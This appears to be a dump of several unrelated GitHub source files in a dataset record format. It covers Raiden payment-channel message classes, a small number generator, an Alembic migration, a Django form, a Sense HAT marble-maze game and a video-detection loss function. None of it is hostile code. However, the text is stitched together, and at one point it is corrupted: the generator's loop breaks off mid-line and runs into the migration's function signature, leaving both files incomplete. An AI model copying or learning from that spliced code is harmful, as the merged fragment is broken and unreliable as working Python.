locked_amount=balance_proof.locked_amount,\n locksroot=balance_proof.locksroot,\n secret=event.secret,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass RevealSecret(SignedRetrieableMessage):\n \"\"\"Message used to reveal a secret to party known to have interest in it.\n\n This message is not sufficient for state changes in the raiden Channel, the\n reason is that a node participating in split transfer or in both mediated\n transfer for an exchange might can reveal the secret to it's partners, but\n that must not update the internal channel state.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.REVEALSECRET\n\n secret: Secret = field(repr=False)\n\n @property # type: ignore\n @cached(_hashes_cache, key=attrgetter(\"secret\"))\n def secrethash(self):\n return sha3(self.secret)\n\n @classmethod\n def unpack(cls, packed):\n reveal_secret = RevealSecret(\n message_identifier=packed.message_identifier,\n secret=packed.secret,\n signature=packed.signature,\n )\n return reveal_secret\n\n def pack(self, packed) -> None:\n packed.message_identifier = self.message_identifier\n packed.secret = self.secret\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n # pylint: disable=unexpected-keyword-arg\n return cls(\n message_identifier=event.message_identifier,\n secret=event.secret,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass Lock:\n \"\"\" Describes a locked `amount`.\n\n Args:\n amount: Amount of the token being transferred.\n expiration: Highest block_number until which the transfer can be settled\n secrethash: Hashed secret `sha3(secret)` used to register the transfer,\n the real `secret` is necessary to release the locked amount.\n \"\"\"\n\n # Lock is not a message, it is a serializable structure that is reused in\n # some messages\n amount: PaymentWithFeeAmount\n expiration: BlockExpiration\n secrethash: SecretHash\n\n def __post_init__(self):\n # guarantee that `amount` can be serialized using the available bytes\n # in the fixed length format\n if self.amount < 0:\n raise ValueError(f\"amount {self.amount} needs to be positive\")\n\n if self.amount > UINT256_MAX:\n raise ValueError(f\"amount {self.amount} is too large\")\n\n if self.expiration < 0:\n raise ValueError(f\"expiration {self.expiration} needs to be positive\")\n\n if self.expiration > UINT256_MAX:\n raise ValueError(f\"expiration {self.expiration} is too large\")\n\n if not ishash(self.secrethash):\n raise ValueError(\"secrethash {self.secrethash} is not a valid hash\")\n\n @property # type: ignore\n @cached(_lock_bytes_cache, key=attrgetter(\"amount\", \"expiration\", \"secrethash\"))\n def as_bytes(self):\n packed = messages.Lock(buffer_for(messages.Lock))\n packed.amount = self.amount\n packed.expiration = self.expiration\n packed.secrethash = self.secrethash\n\n # convert bytearray to bytes\n return bytes(packed.data)\n\n @property # type: ignore\n @cached(_hashes_cache, key=attrgetter(\"as_bytes\"))\n def lockhash(self):\n return sha3(self.as_bytes)\n\n @classmethod\n def from_bytes(cls, serialized):\n packed = messages.Lock(serialized)\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n\n@dataclass(repr=False, eq=False)\nclass LockedTransferBase(EnvelopeMessage):\n \"\"\" A transfer which signs that the partner can claim `locked_amount` if\n she knows the secret to `secrethash`.\n\n The token amount is implicitly represented in the 
`locksroot` and won't be\n reflected in the `transferred_amount` until the secret is revealed.\n\n This signs Carol, that she can claim locked_amount from Bob if she knows\n the secret to secrethash.\n\n If the secret to secrethash becomes public, but Bob fails to sign Carol a\n netted balance, with an updated rootlock which reflects the deletion of the\n lock, then Carol can request settlement on chain by providing: any signed\n [nonce, token, balance, recipient, locksroot, ...] along a merkle proof\n from locksroot to the not yet netted formerly locked amount.\n \"\"\"\n\n payment_identifier: PaymentID\n token: TokenAddress\n recipient: Address\n lock: Lock\n\n def __post_init__(self):\n super().__post_init__()\n assert_transfer_values(self.payment_identifier, self.token, self.recipient)\n\n @classmethod\n def unpack(cls, packed):\n lock = Lock(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n # pylint: disable=unexpected-keyword-arg\n locked_transfer = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n token=packed.token,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n recipient=packed.recipient,\n locked_amount=packed.locked_amount,\n locksroot=packed.locksroot,\n lock=lock,\n signature=packed.signature,\n )\n return locked_transfer\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.nonce = self.nonce\n packed.token_network_address = self.token_network_address\n packed.token = self.token\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.recipient = self.recipient\n packed.locksroot = self.locksroot\n\n lock = self.lock\n packed.amount = lock.amount\n packed.expiration = lock.expiration\n packed.secrethash = lock.secrethash\n\n packed.signature = self.signature\n\n\n@dataclass(repr=False, eq=False)\nclass LockedTransfer(LockedTransferBase):\n \"\"\"\n A LockedTransfer has a `target` address to which a chain of transfers shall\n be established. Here the `secrethash` is mandatory.\n\n `fee` is the remaining fee a recipient shall use to complete the mediated transfer.\n The recipient can deduct his own fee from the amount and lower `fee` to the remaining fee.\n Just as the recipient can fail to forward at all, or the assumed amount,\n it can deduct a too high fee, but this would render completion of the transfer unlikely.\n\n The initiator of a mediated transfer will calculate fees based on the likely fees along the\n path. 
Note, it can not determine the path, as it does not know which nodes are available.\n\n Initial `amount` should be expected received amount + fees.\n\n Fees are always payable by the initiator.\n\n `initiator` is the party that knows the secret to the `secrethash`\n \"\"\"\n\n cmdid: ClassVar[int] = messages.LOCKEDTRANSFER\n\n target: TargetAddress\n initiator: InitiatorAddress\n fee: int\n\n def __post_init__(self):\n super().__post_init__()\n\n if len(self.target) != 20:\n raise ValueError(\"target is an invalid address\")\n\n if len(self.initiator) != 20:\n raise ValueError(\"initiator is an invalid address\")\n\n if self.fee > UINT256_MAX:\n raise ValueError(\"fee is too large\")\n\n @classmethod\n def unpack(cls, packed):\n lock = Lock(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n # pylint: disable=unexpected-keyword-arg\n mediated_transfer = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n token=packed.token,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n locked_amount=packed.locked_amount,\n recipient=packed.recipient,\n locksroot=packed.locksroot,\n lock=lock,\n target=packed.target,\n initiator=packed.initiator,\n fee=packed.fee,\n signature=packed.signature,\n )\n return mediated_transfer\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.message_identifier = self.message_identifier\n packed.payment_identifier = self.payment_identifier\n packed.nonce = self.nonce\n packed.token_network_address = self.token_network_address\n packed.token = self.token\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.recipient = self.recipient\n packed.locksroot = self.locksroot\n packed.target = self.target\n packed.initiator = self.initiator\n packed.fee = self.fee\n\n lock = self.lock\n packed.amount = lock.amount\n packed.expiration = lock.expiration\n packed.secrethash = lock.secrethash\n\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event: SendLockedTransfer) -> \"LockedTransfer\":\n transfer = event.transfer\n balance_proof = transfer.balance_proof\n lock = Lock(\n amount=transfer.lock.amount,\n expiration=transfer.lock.expiration,\n secrethash=transfer.lock.secrethash,\n )\n fee = 0\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n message_identifier=event.message_identifier,\n payment_identifier=transfer.payment_identifier,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n token=transfer.token,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n locked_amount=balance_proof.locked_amount,\n recipient=event.recipient,\n locksroot=balance_proof.locksroot,\n lock=lock,\n target=transfer.target,\n initiator=transfer.initiator,\n fee=fee,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass RefundTransfer(LockedTransfer):\n \"\"\" A special LockedTransfer sent from a payee to a payer indicating that\n no route is available, this transfer will effectively refund the payer the\n transfer amount allowing him to try a new path to complete the transfer.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.REFUNDTRANSFER\n\n 
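    # Worked example of the fee accounting described in the parent\n    # LockedTransfer docstring above: to deliver 100 tokens through two\n    # mediators charging 1 each, the initiator sends amount=102 with fee=2;\n    # the first mediator forwards amount=101/fee=1 and the second forwards\n    # amount=100/fee=0 to the target.\n\n    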
@classmethod\n def unpack(cls, packed):\n lock = Lock(\n amount=packed.amount, expiration=packed.expiration, secrethash=packed.secrethash\n )\n\n # pylint: disable=unexpected-keyword-arg\n locked_transfer = cls(\n chain_id=packed.chain_id,\n message_identifier=packed.message_identifier,\n payment_identifier=packed.payment_identifier,\n nonce=packed.nonce,\n token_network_address=packed.token_network_address,\n token=packed.token,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n locked_amount=packed.locked_amount,\n recipient=packed.recipient,\n locksroot=packed.locksroot,\n lock=lock,\n target=packed.target,\n initiator=packed.initiator,\n fee=packed.fee,\n signature=packed.signature,\n )\n return locked_transfer\n\n @classmethod\n def from_event(cls, event):\n transfer = event.transfer\n balance_proof = transfer.balance_proof\n lock = Lock(\n amount=transfer.lock.amount,\n expiration=transfer.lock.expiration,\n secrethash=transfer.lock.secrethash,\n )\n fee = 0\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n message_identifier=event.message_identifier,\n payment_identifier=transfer.payment_identifier,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n token=transfer.token,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n locked_amount=balance_proof.locked_amount,\n recipient=event.recipient,\n locksroot=balance_proof.locksroot,\n lock=lock,\n target=transfer.target,\n initiator=transfer.initiator,\n fee=fee,\n signature=EMPTY_SIGNATURE,\n )\n\n\n@dataclass(repr=False, eq=False)\nclass LockExpired(EnvelopeMessage):\n \"\"\"Message used to notify opposite channel participant that a lock has\n expired.\n \"\"\"\n\n cmdid: ClassVar[int] = messages.LOCKEXPIRED\n\n recipient: Address\n secrethash: SecretHash\n\n @classmethod\n def unpack(cls, packed):\n # pylint: disable=unexpected-keyword-arg\n transfer = cls(\n chain_id=packed.chain_id,\n nonce=packed.nonce,\n message_identifier=packed.message_identifier,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n transferred_amount=packed.transferred_amount,\n recipient=packed.recipient,\n locked_amount=packed.locked_amount,\n locksroot=packed.locksroot,\n secrethash=packed.secrethash,\n signature=packed.signature,\n )\n\n return transfer\n\n def pack(self, packed) -> None:\n packed.chain_id = self.chain_id\n packed.nonce = self.nonce\n packed.message_identifier = self.message_identifier\n packed.token_network_address = self.token_network_address\n packed.channel_identifier = self.channel_identifier\n packed.transferred_amount = self.transferred_amount\n packed.locked_amount = self.locked_amount\n packed.recipient = self.recipient\n packed.locksroot = self.locksroot\n packed.secrethash = self.secrethash\n packed.signature = self.signature\n\n @classmethod\n def from_event(cls, event):\n balance_proof = event.balance_proof\n\n # pylint: disable=unexpected-keyword-arg\n return cls(\n chain_id=balance_proof.chain_id,\n nonce=balance_proof.nonce,\n token_network_address=balance_proof.token_network_address,\n channel_identifier=balance_proof.channel_identifier,\n transferred_amount=balance_proof.transferred_amount,\n locked_amount=balance_proof.locked_amount,\n locksroot=balance_proof.locksroot,\n message_identifier=event.message_identifier,\n recipient=event.recipient,\n secrethash=event.secrethash,\n 
signature=EMPTY_SIGNATURE,\n        )\n\n\n@dataclass(repr=False, eq=False)\nclass SignedBlindedBalanceProof:\n    \"\"\"Message sub-field `onchain_balance_proof` for `RequestMonitoring`.\n    \"\"\"\n\n    channel_identifier: ChannelID\n    token_network_address: TokenNetworkAddress\n    nonce: Nonce\n    additional_hash: AdditionalHash\n    chain_id: ChainID\n    balance_hash: BalanceHash\n    signature: Signature\n    non_closing_signature: Optional[Signature] = field(default=EMPTY_SIGNATURE)\n\n    def __post_init__(self):\n        if self.signature == EMPTY_SIGNATURE:\n            raise ValueError(\"balance proof is not signed\")\n\n
    @classmethod\n    def from_balance_proof_signed_state(\n        cls, balance_proof: BalanceProofSignedState\n    ) -> \"SignedBlindedBalanceProof\":\n        if not isinstance(balance_proof, BalanceProofSignedState):\n            raise ValueError(\n                \"balance_proof is not an instance of the type BalanceProofSignedState\"\n            )\n\n        # pylint: disable=unexpected-keyword-arg\n        return cls(\n            channel_identifier=balance_proof.channel_identifier,\n            token_network_address=balance_proof.token_network_address,\n            nonce=balance_proof.nonce,\n            additional_hash=balance_proof.message_hash,\n            chain_id=balance_proof.chain_id,\n            signature=balance_proof.signature,\n            balance_hash=hash_balance_data(\n                balance_proof.transferred_amount,\n                balance_proof.locked_amount,\n                balance_proof.locksroot,\n            ),\n        )\n\n
    def _data_to_sign(self) -> bytes:\n        packed = pack_balance_proof_update(\n            nonce=self.nonce,\n            balance_hash=self.balance_hash,\n            additional_hash=self.additional_hash,\n            canonical_identifier=CanonicalIdentifier(\n                chain_identifier=self.chain_id,\n                token_network_address=self.token_network_address,\n                channel_identifier=self.channel_identifier,\n            ),\n            partner_signature=self.signature,\n        )\n        return packed\n\n    def _sign(self, signer: Signer) -> Signature:\n        \"\"\"Internal function for the overall `sign` function of `RequestMonitoring`.\n        \"\"\"\n        # Important: we don't write the signature to `.signature`\n        data = self._data_to_sign()\n        return signer.sign(data)\n\n\n
@dataclass(repr=False, eq=False)\nclass RequestMonitoring(SignedMessage):\n    \"\"\"Message to request channel watching from a monitoring service.\n    Spec:\n        https://raiden-network-specification.readthedocs.io/en/latest/monitoring_service.html\\\n#monitor-request\n    \"\"\"\n\n    balance_proof: SignedBlindedBalanceProof\n    reward_amount: TokenAmount\n    non_closing_signature: Optional[Signature] = None\n\n    def __post_init__(self):\n        if self.balance_proof is None:\n            raise ValueError(\"no balance proof given\")\n\n        if not isinstance(self.balance_proof, SignedBlindedBalanceProof):\n            raise ValueError(\"onchain_balance_proof is not a SignedBlindedBalanceProof\")\n\n
    @classmethod\n    def from_balance_proof_signed_state(\n        cls, balance_proof: BalanceProofSignedState, reward_amount: TokenAmount\n    ) -> \"RequestMonitoring\":\n        if not isinstance(balance_proof, BalanceProofSignedState):\n            raise ValueError(\n                \"balance_proof is not an instance of the type BalanceProofSignedState\"\n            )\n\n        onchain_balance_proof = SignedBlindedBalanceProof.from_balance_proof_signed_state(\n            balance_proof=balance_proof\n        )\n        # pylint: disable=unexpected-keyword-arg\n        return cls(\n            balance_proof=onchain_balance_proof,\n            reward_amount=reward_amount,\n            signature=EMPTY_SIGNATURE,\n        )\n\n    @property\n    def reward_proof_signature(self) -> Optional[Signature]:\n        return self.signature\n\n    def _data_to_sign(self) -> bytes:\n        \"\"\" Return the binary data to be/which was signed 
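        (for RequestMonitoring this is the packed reward proof built below\n        from the canonical identifier, reward amount and nonce).\n        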
\"\"\"\n packed = pack_reward_proof(\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n reward_amount=self.reward_amount,\n nonce=self.balance_proof.nonce,\n )\n return packed\n\n def sign(self, signer: Signer):\n \"\"\"This method signs twice:\n - the `non_closing_signature` for the balance proof update\n - the `reward_proof_signature` for the monitoring request\n \"\"\"\n self.non_closing_signature = self.balance_proof._sign(signer)\n message_data = self._data_to_sign()\n self.signature = signer.sign(data=message_data)\n\n def packed(self) -> bytes:\n klass = messages.RequestMonitoring\n data = buffer_for(klass)\n packed = klass(data)\n self.pack(packed)\n return packed\n\n def pack(self, packed) -> None:\n if self.non_closing_signature is None:\n raise ValueError(\"non_closing_signature missing, did you forget to sign()?\")\n if self.reward_proof_signature is None:\n raise ValueError(\"reward_proof_signature missing, did you forget to sign()?\")\n packed.nonce = self.balance_proof.nonce\n packed.chain_id = self.balance_proof.chain_id\n packed.token_network_address = self.balance_proof.token_network_address\n packed.channel_identifier = self.balance_proof.channel_identifier\n packed.balance_hash = self.balance_proof.balance_hash\n packed.additional_hash = self.balance_proof.additional_hash\n packed.signature = self.balance_proof.signature\n packed.non_closing_signature = self.non_closing_signature\n packed.reward_amount = self.reward_amount\n packed.reward_proof_signature = self.reward_proof_signature\n\n @classmethod\n def unpack(cls, packed) -> \"RequestMonitoring\":\n onchain_balance_proof = SignedBlindedBalanceProof(\n nonce=packed.nonce,\n chain_id=packed.chain_id,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n balance_hash=packed.balance_hash,\n additional_hash=packed.additional_hash,\n signature=packed.signature,\n )\n # pylint: disable=unexpected-keyword-arg\n monitoring_request = cls(\n balance_proof=onchain_balance_proof,\n non_closing_signature=packed.non_closing_signature,\n reward_amount=packed.reward_amount,\n signature=packed.reward_proof_signature,\n )\n return monitoring_request\n\n def verify_request_monitoring(\n self, partner_address: Address, requesting_address: Address\n ) -> bool:\n \"\"\" One should only use this method to verify integrity and signatures of a\n RequestMonitoring message. 
\"\"\"\n if not self.non_closing_signature:\n return False\n\n balance_proof_data = pack_balance_proof(\n nonce=self.balance_proof.nonce,\n balance_hash=self.balance_proof.balance_hash,\n additional_hash=self.balance_proof.additional_hash,\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n )\n blinded_data = pack_balance_proof_update(\n nonce=self.balance_proof.nonce,\n balance_hash=self.balance_proof.balance_hash,\n additional_hash=self.balance_proof.additional_hash,\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n partner_signature=self.balance_proof.signature,\n )\n reward_proof_data = pack_reward_proof(\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=self.balance_proof.chain_id,\n token_network_address=self.balance_proof.token_network_address,\n channel_identifier=self.balance_proof.channel_identifier,\n ),\n reward_amount=self.reward_amount,\n nonce=self.balance_proof.nonce,\n )\n reward_proof_signature = self.reward_proof_signature or EMPTY_SIGNATURE\n return (\n recover(balance_proof_data, self.balance_proof.signature) == partner_address\n and recover(blinded_data, self.non_closing_signature) == requesting_address\n and recover(reward_proof_data, reward_proof_signature) == requesting_address\n )\n\n\n@dataclass(repr=False, eq=False)\nclass UpdatePFS(SignedMessage):\n \"\"\" Message to inform a pathfinding service about a capacity change. \"\"\"\n\n canonical_identifier: CanonicalIdentifier\n updating_participant: Address\n other_participant: Address\n updating_nonce: Nonce\n other_nonce: Nonce\n updating_capacity: TokenAmount\n other_capacity: TokenAmount\n reveal_timeout: int\n mediation_fee: FeeAmount\n\n def __post_init__(self):\n if self.signature is None:\n self.signature = EMPTY_SIGNATURE\n\n @classmethod\n def from_channel_state(cls, channel_state: NettingChannelState) -> \"UpdatePFS\":\n # pylint: disable=unexpected-keyword-arg\n return cls(\n canonical_identifier=channel_state.canonical_identifier,\n updating_participant=channel_state.our_state.address,\n other_participant=channel_state.partner_state.address,\n updating_nonce=channel.get_current_nonce(channel_state.our_state),\n other_nonce=channel.get_current_nonce(channel_state.partner_state),\n updating_capacity=channel.get_distributable(\n sender=channel_state.our_state, receiver=channel_state.partner_state\n ),\n other_capacity=channel.get_distributable(\n sender=channel_state.partner_state, receiver=channel_state.our_state\n ),\n reveal_timeout=channel_state.reveal_timeout,\n mediation_fee=channel_state.mediation_fee,\n signature=EMPTY_SIGNATURE,\n )\n\n def packed(self) -> bytes:\n klass = messages.UpdatePFS\n data = buffer_for(klass)\n packed = klass(data)\n self.pack(packed)\n return packed\n\n def pack(self, packed) -> None:\n packed.chain_id = self.canonical_identifier.chain_identifier\n packed.token_network_address = self.canonical_identifier.token_network_address\n packed.channel_identifier = self.canonical_identifier.channel_identifier\n packed.updating_participant = self.updating_participant\n packed.other_participant = self.other_participant\n packed.updating_nonce = self.updating_nonce\n packed.other_nonce = self.other_nonce\n 
packed.updating_capacity = self.updating_capacity\n packed.other_capacity = self.other_capacity\n packed.reveal_timeout = self.reveal_timeout\n packed.fee = self.mediation_fee\n packed.signature = self.signature\n\n @classmethod\n def unpack(cls, packed) -> \"UpdatePFS\":\n # pylint: disable=unexpected-keyword-arg\n return cls(\n canonical_identifier=CanonicalIdentifier(\n chain_identifier=packed.chain_id,\n token_network_address=packed.token_network_address,\n channel_identifier=packed.channel_identifier,\n ),\n updating_participant=packed.updating_participant,\n other_participant=packed.other_participant,\n updating_nonce=packed.updating_nonce,\n other_nonce=packed.other_nonce,\n updating_capacity=packed.updating_capacity,\n other_capacity=packed.other_capacity,\n reveal_timeout=packed.reveal_timeout,\n mediation_fee=packed.fee,\n signature=packed.signature,\n )\n\n\ndef lockedtransfersigned_from_message(message: LockedTransfer) -> \"LockedTransferSignedState\":\n \"\"\" Create LockedTransferSignedState from a LockedTransfer message. \"\"\"\n balance_proof = balanceproof_from_envelope(message)\n\n lock = HashTimeLockState(message.lock.amount, message.lock.expiration, message.lock.secrethash)\n\n transfer_state = LockedTransferSignedState(\n message.message_identifier,\n message.payment_identifier,\n message.token,\n balance_proof,\n lock,\n message.initiator,\n message.target,\n )\n\n return transfer_state\n\n\nCMDID_TO_CLASS: Dict[int, Type[Message]] = {\n messages.DELIVERED: Delivered,\n messages.LOCKEDTRANSFER: LockedTransfer,\n messages.PING: Ping,\n messages.PONG: Pong,\n messages.PROCESSED: Processed,\n messages.REFUNDTRANSFER: RefundTransfer,\n messages.REVEALSECRET: RevealSecret,\n messages.UNLOCK: Unlock,\n messages.SECRETREQUEST: SecretRequest,\n messages.LOCKEXPIRED: LockExpired,\n messages.TODEVICE: ToDevice,\n}\n\nCLASSNAME_TO_CLASS = {klass.__name__: klass for klass in CMDID_TO_CLASS.values()}\nCLASSNAME_TO_CLASS[\"Secret\"] = Unlock\n","repo_name":"hoonkii/raiden","sub_path":"raiden/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":47449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"11370402676","text":"def generapares(limite):\n\n\tnum=1\n\n\tmiLista=[]\n\n\twhile num None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_products_id', table_name='products')\n op.drop_table('products')\n op.drop_index('ix_keys_id', table_name='keys')\n op.drop_table('keys')\n op.drop_index('ix_person_id', table_name='person')\n op.create_index(op.f('ix_person_id'), 'person', ['id'], unique=True)\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_person_id'), table_name='person')\n op.create_index('ix_person_id', 'person', ['id'], unique=False)\n op.create_table('keys',\n sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('code', sa.VARCHAR(), autoincrement=False, nullable=False),\n sa.Column('created_at', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),\n sa.Column('price', sa.INTEGER(), autoincrement=False, nullable=False),\n sa.PrimaryKeyConstraint('id', name='keys_pkey')\n )\n op.create_index('ix_keys_id', 'keys', ['id'], unique=False)\n op.create_table('products',\n sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('name', sa.VARCHAR(length=32), autoincrement=False, nullable=False),\n sa.PrimaryKeyConstraint('id', name='products_pkey')\n )\n op.create_index('ix_products_id', 'products', ['id'], unique=False)\n # ### end Alembic commands ###\n","repo_name":"Andemir-programing/python6_FAST_API_PostgreSQL-","sub_path":"alembic/versions/891bb6bab2f7_del_tables_keys_and_product.py","file_name":"891bb6bab2f7_del_tables_keys_and_product.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71099145129","text":"from django import forms\nfrom .models import Product, Category\nfrom .widgets import CustomClearableFileInput\n\n\nclass ProductForm(forms.ModelForm):\n class Meta:\n model = Product\n # To include all fields\n fields = ('image', 'product_name', 'category', 'price', 'overall_rating', 'brand_name', 'product_description',\n 'exclusive')\n # fields = '__all__'\n\n image = forms.ImageField(label='Image',\n required=False,\n widget=CustomClearableFileInput)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n categories = Category.objects.all()\n friendly_names = [(c.id, c.get_friendly_name()) for c in categories]\n # friendly_names.insert(0, (0, 'Category *'))\n\n self.fields['category'].choices = friendly_names\n\n for field_name, field in self.fields.items():\n # if field_name == 'category':\n # field.label = False\n # field.widget.attrs['class'] = 'grey-text'\n if field.required:\n field.label = f'{field.label} *'\n if field_name == 'product_description':\n field.widget.attrs['data-length'] = '120'\n","repo_name":"ArloysMacias/fitness4you","sub_path":"products/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30542471095","text":"from sense_hat import SenseHat\nfrom time import sleep\nimport time\nfrom datetime import datetime\nnow = datetime.now()\ncurrent_time = now.strftime(\"%H:%M:%S\")\nfrom stopwatch import Stopwatch\nstopwatch = Stopwatch()\n\nfrom importlib import reload \n\nsense = SenseHat()\nsense.clear()\n\nr = (255,0,0)\nb = (0,0,0)\nw = (255,255,255)\ng = (0, 255, 0)\n\nx = 1\ny = 1\n\nstopwatch.restart()\n\nmaze = [[r,r,r,r,r,r,r,r],\n [r,b,b,b,b,b,b,r],\n [r,r,r,r,r,b,b,r],\n [r,b,b,b,r,r,b,r],\n [r,b,r,b,b,b,b,r],\n [r,b,r,r,r,r,r,r],\n [r,b,b,b,b,b,g,r],\n [r,r,r,r,r,r,r,r]]\n\ndef move_marble(pitch, roll, x, y):\n new_x = x\n new_y = y\n if 1 < pitch < 179 and x != 0:\n new_x -= 1\n elif 359 > pitch > 181 and x != 7:\n new_x += 1\n if 1 < roll < 179 and y != 7:\n new_y += 1\n elif 359 > roll > 179 and y != 0:\n new_y -= 1\n new_x, new_y = check_wall(x,y,new_x,new_y)\n return new_x, new_y\n\ndef check_wall(x,y,new_x,new_y):\n if maze[new_y][new_x] != r:\n 
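# the target cell is free, take the full move; the branches below slide along walls instead\n 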
return new_x, new_y\n elif maze[new_y][x] != r:\n return x, new_y\n elif maze[y][new_x] != r:\n return new_x, y\n else:\n return x,y\n\ndef restart():\n import sys\n #print(\"argv was\",sys.argv)\n #print(\"sys.executable was\", sys.executable)\n print(\"restart now\")\n import os\n os.execv(sys.executable, ['python'] + sys.argv)\n\ngame_over = 1\nwhile game_over == 1:\n o = sense.get_orientation()\n pitch = o[\"pitch\"]\n roll = o[\"roll\"]\n x,y = move_marble(pitch,roll,x,y)\n if maze[y][x] == g:\n sense.show_message(\"win\")\n stopwatch.stop()\n score = stopwatch.duration\n score = round(score, 1)\n sense.show_message(\"score\")\n sense.show_message(str(score))\n #send score to database\n #exit()\n game_over = 2\n maze[y][x] = w\n sense.set_pixels(sum(maze,[]))\n sleep(0.1)\n maze[y][x] = b\nwhile game_over == 2:\n #execfile('marble_maze_menu.py')\n exec(open(\"marble_maze_menu.py\").read())\n exit(1)","repo_name":"Ojansen/marble_maze","sub_path":"marble_maze_level_1.py","file_name":"marble_maze_level_1.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11019570182","text":"import torch\r\nimport torch.nn.functional as F\r\n\r\n\r\ndef SSAD_loss_function(all_prediction_x, all_prediction_w, all_prediction_score, all_prediction_label,\r\n batch_match_x, batch_match_w, batch_match_scores, batch_match_labels, device, config):\r\n # calc Loss\r\n pmask = torch.ge(batch_match_scores, 0.5).float()\r\n num_positive = torch.sum(pmask)\r\n # print('num_positive', num_positive)\r\n num_entries = all_prediction_x.shape[0] * all_prediction_x.shape[1]\r\n\r\n hmask = batch_match_scores < 0.5\r\n hmask = hmask & (all_prediction_score > 0.5)\r\n hmask = hmask.float()\r\n num_hard = torch.sum(hmask)\r\n\r\n r_negative = (config.negative_ratio - num_hard / num_positive) * num_positive / (\r\n num_entries - num_positive - num_hard)\r\n r_negative = torch.min(r_negative, torch.Tensor([1.0]).to(device))\r\n nmask = torch.rand(pmask.size()).to(device)\r\n nmask = nmask * (1. - pmask)\r\n nmask = nmask * (1. - hmask)\r\n nmask = torch.ge(nmask, 1. - r_negative).float()\r\n # print(r_negative, num_positive, num_hard, torch.sum(nmask))\r\n # class_loss\r\n weights = pmask + nmask + hmask\r\n all_prediction_label = all_prediction_label.transpose(1, 2).contiguous().view(-1, config.num_classes)\r\n batch_match_labels = batch_match_labels.view(-1)\r\n class_loss = F.cross_entropy(all_prediction_label, batch_match_labels, reduction='none')\r\n class_loss = torch.sum(class_loss * weights.view(-1)) / torch.sum(weights)\r\n # loc_loss\r\n weights = pmask\r\n tmp_anchors_xmin = all_prediction_x - all_prediction_w / 2\r\n tmp_anchors_xmax = all_prediction_x + all_prediction_w / 2\r\n tmp_match_xmin = batch_match_x - batch_match_w / 2\r\n tmp_match_xmax = batch_match_x + batch_match_w / 2\r\n\r\n loc_loss = F.smooth_l1_loss(tmp_anchors_xmin, tmp_match_xmin, reduction='none') + F.smooth_l1_loss(\r\n tmp_anchors_xmax, tmp_match_xmax, reduction='none')\r\n loc_loss = torch.sum(loc_loss * weights) / torch.sum(weights)\r\n\r\n # conf loss\r\n weights = pmask + nmask + hmask\r\n # match_scores is from jaccard_with_anchors\r\n conf_loss = F.smooth_l1_loss(all_prediction_score, batch_match_scores, 